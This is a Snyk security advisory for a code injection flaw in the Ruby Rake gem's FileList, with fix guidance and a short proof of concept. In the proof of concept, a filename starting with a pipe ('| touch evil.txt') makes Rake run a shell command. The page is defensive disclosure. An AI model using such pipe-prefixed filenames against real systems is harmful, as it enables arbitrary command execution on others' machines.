Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.Test your applications
- Snyk ID SNYK-RUBY-RAKE-552000
- published 24 Feb 2020
- disclosed 24 Feb 2020
- credit Katsuhiko Yoshida
How to fix?
rake to version 12.3.3 or higher.
rake is a Make-like program implemented in Ruby.
Affected versions of this package are vulnerable to Arbitrary Code Injection in
Rake::FileList when supplying a filename that begins with the pipe character
PoC by Katsuhiko Yoshida
% ls -1 Gemfile Gemfile.lock poc_rake.rb vendor | touch evil.txt % bundle exec ruby poc_rake.rb ["poc_rake.rb", "Gemfile", "Gemfile.lock", "| touch evil.txt", "vendor"] poc_rake.rb:6:list.egrep(/something/) Error while processing 'vendor': Is a directory @ io_fillbuf - fd:7 vendor % ls -1 Gemfile Gemfile.lock evil.txt poc_rake.rb vendor | touch evil.txt